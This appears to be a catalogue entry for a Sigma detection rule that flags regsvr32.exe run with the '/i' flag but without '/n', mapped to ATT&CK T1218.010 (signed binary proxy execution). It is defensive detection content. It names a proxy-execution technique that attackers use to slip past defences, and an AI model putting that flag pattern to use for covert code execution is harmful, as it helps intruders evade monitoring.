Techniques
Sample rules
Potential Regsvr32 Commandline Flag Anomaly
- source: sigma
- technicques:
- t1218
- t1218.010
Description
Detects a potential command line flag anomaly related to “regsvr32” in which the “/i” flag is used without the “/n” which should be uncommon.
Detection logic
condition: selection and not 1 of filter_main_*
filter_main_flag:
CommandLine|contains|windash: ' -n '
selection:
CommandLine|contains|windash: ' -i:'
Image|endswith: \regsvr32.exe